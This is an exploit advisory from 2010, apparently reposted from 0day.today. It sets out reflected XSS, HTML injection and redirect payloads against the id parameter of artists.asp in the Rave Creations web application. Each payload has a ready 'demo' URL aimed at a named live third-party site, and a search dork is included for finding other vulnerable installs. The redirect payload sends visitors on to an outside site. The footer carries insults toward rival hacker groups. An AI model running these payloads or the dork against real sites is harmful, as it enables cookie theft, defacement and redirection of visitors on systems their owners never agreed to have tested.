Rave Creations (artists.asp) XSS Multiple Vulnerabilities

🗓️ 29 Jun 2010 00:00:00Reported by **RoAd_KiLlEr**Type

zdt🔗 0day.today👁 21 Views

Rave Creations (artists.asp) Multiple XSS and HTML Injectio

=========================================================
Rave Creations (artists.asp) XSS Multiple Vulnerabilities
=========================================================


[+]Title Rave Creations (artists.asp) XSS Multiple Vulnerabilities
[+]Author **RoAd_KiLlEr**
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Vendor :N/A
==========ExPl0iT3d by **RoAd_KiLlEr**==========


[+] Dork: Sitedesign by: Dieleman www.dieleman.nl - Copyright ? 2010

==========================================


[1]. XSS Vulnerability
=+=+=+=+=+=+=+=+=+

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/artists.asp?id=[Exploit]


[Exploit]: "><script>alert(document.cookie)</script>

Dem0:
~~~~~
http://www.u-h-m.de/artists.asp?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

[2]. HTML Injection
=+=+=+=+=+=+=+=+=+

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/artists.asp?id=[Exploit]

[Exploit]: ">><marquee><h1><font color=Red size=16>XSS by **RoAd_KiLlEr**</font></h1><marquee>

Dem0:
~~~~~
http://www.u-h-m.de/artists.asp?id=%22%3E%3E%3Cmarquee%3E%3Ch1%3E%3Cfont%20color=Red%20size=16%3EXSS%20by%20**RoAd_KiLlEr**%3C/font%3E%3C/h1%3E%3Cmarquee%3E

[3]. URL Redirect Vulnerability
=+=+=+=+=+=+=+=+=+

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/artists.asp?id=[Exploit]

[Exploit]: "><script>alert(document.cookie)</script><HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect ...</BODY></HTML>

Dem0:
~~~~~
http://www.u-h-m.de/artists.asp?id="><script>alert(document.cookie)</script><HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect ...</BODY></HTML>

===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr** Says: Fuck You EraGon,Fuck Dark Hackers Team & Mos u shti me baben se baba ta qin nanen ;)
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-net | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail
| NEO from DATA ir Security Group | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friends
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================



#  0day.today [2018-03-19]  #

29 Jun 2010 00:00Current

7.1High risk

Vulners AI Score7.1